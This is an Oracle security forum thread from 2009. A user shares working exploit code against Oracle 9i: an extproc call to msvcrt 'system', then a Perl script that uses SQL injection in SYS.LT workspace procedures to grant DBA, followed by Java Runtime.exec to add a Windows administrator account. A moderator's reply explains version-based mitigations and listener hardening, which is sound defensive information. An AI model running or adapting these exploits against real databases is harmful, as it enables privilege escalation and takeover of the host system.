Pete Finnigan's Oracle Security Forum
        (http://www.petefinnigan.com/forum/yabb/YaBB.cgi)
      

        Oracle Security >> Oracle Security >> Exploite extproc 
        
(Message started by: Pete Finnigan on May 23rd, 2009, 2:53pm)
Title: Exploite extproc
Post by Pete Finnigan on May 23rd, 2009, 2:53pm
Hi ,
I try to test this vulnerability(extproc) but i have some problem :

Frist :I connecte as scott/tiger
Second:i excuted this code:


CREATE OR REPLACE LIBRARY exec_shell AS 'C:\WINDOWS\system32\msvcrt.dll';

CREATE OR REPLACE PROCEDURE oraexec (cmdstring IN CHAR)
IS EXTERNAL
NAME "system"
LIBRARY exec_shell
LANGUAGE C;
/

SQL>EXEC ORAEXEC('NET USER Mesli Mesli /ADD');

Output:
BEGIN:EXEC ORAEXEC('NET USER Mesli Mesli /ADD');END;
*
erreur a la ligne 1:
ORA-28595:  Extproc agent :invalid DLL path
ORA-06512:o "SCOTT.ORAEXEC" ,ligne 0
ORA-06512:o ligne 1.



I check the DLL path but  the path C:\WINDOWS\system32\msvcrt.dll is correct.

I try with SYS user but the some error occur.

PLZ Help me .
Title: Re: Exploite extproc
Post by Pete Finnigan on May 28th, 2009, 8:50am
Hi,

Thanks for your post. Yopu dont say which version of Oracle you are on but basically Oracle has added controls to prevent this from working. In earlier versions of Oracle you could do this; I am sure I have a version of this code somewhere on my site, probably against 8.1.7.

Oracle in 11g no longer enables extproc by default in the listener. In earlier versions Oracle added a check to make sure that the DLL loaded is in the $ORACLE_HOME/bin unless you have added parameters to allow it to run from elsewhere. The ENVS parameter of the listener.ora can be used to override this. the Worst setting would be ENVS=EXTPROC_DLLS=ANY which would give you an expolitable listener. The safest setting is to remove extproc completely, if its used then run the listener as a different user and specify EXTPROC_DLLS=ONLY and specify the path.

So I am guessing this doesnt work because of the version of Oracle that you are on.

Exploits are very time / version specific; thats not to say that you cannot find vulnerable systems still being used.

cheers

Pete
Title: Re: Exploite extproc
Post by Pete Finnigan on Jun 18th, 2009, 9:51am
Hi ,
thanks pete for your reply,i find other method (i use java ) to add both system user & administrators, i tried to write a perl script to this vulnérability but there were some problems
Code
use strict;
use warnings;
use strict;  
use DBI;      
use DBD::Oracle;
use Getopt::Std;
use vars qw/ %opt /;

sub usage {
   print <<"USAGE";
   
Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -U <system_user> -P <passw_user>

Options:
    -h     <host>     target server address
    -s     <sid>      target sid name
    -u     <user>     user
    -p     <passwd>   password
    -U     <System-user>
    -P     <Passw-user>
   

USAGE
   exit 0
}

my $opt_string = 'h:s:u:p:U:P';
getopts($opt_string, \%opt) or &usage;
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} or !$opt{U} or !$opt{P});
my $user = uc $opt{u};
my $password = $opt{p};
my $system_user = $opt{U};
my $passw_user = $opt{P};
my $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}, $opt{U} ,$opt{P}) or die; /*line 35




$dbh->do( qq{
        CREATE OR REPLACE FUNCTION Y return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO $user';
COMMIT;
RETURN 'Y';
END;
/
exec SYS.LT.CREATEWORKSPACE('sh2kerr'' and $user.Y()=''Y');
exec SYS.LT.MERGEWORKSPACE('sh2kerr'' and $user.Y()=''Y');
exec dbms_java.grant_permission('$user', 'SYS:java.io.FilePermission','<<ALL FILES>>','execute');
exec dbms_java.grant_permission('$user', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');
exec dbms_java.grant_permission('$user', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');
CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVACMD" AS
import java.lang.*;
import java.io.*;
public class JAVACMD
{
public static void execCommand (String command) throws IOException
{
Runtime.getRuntime().exec(command);
}
};
/
CREATE OR REPLACE PROCEDURE JAVAEXEC (p_command IN VARCHAR2)
AS LANGUAGE JAVA
NAME 'JAVACMD.execCommand (java.lang.String)';
/
exec javaexec(‘net user $system_user $passw_user /add’);
exec javaexec ('net localgroup /ADD Administrators $system_user');

           }
      );


print " $system_user IS a system user \n";



$dbh->disconnect;

exit;

OUTPUT:
DBI->connect using 'old-style' syntax is deprecated and will be an err
+or in future versions  at Add_user.pl line 35
can't use string ("1")as a HASH ref while "strict refs" in use at C:/Perl/lib/DBI.pm line 561.



Info:
1.i tried this with the acount Scott who is a dba (sql injection)
2.i tried the PL/SQL program and it work fine but when i try to convert Pl/SQL file to perl the precedents errors occur( system =windows server 2003 oracle version: 9iR2)

thank you in advance.


Powered by YaBB 1 Gold - SP 1.4!
Forum software copyright © 2000-2004 Yet another Bulletin Board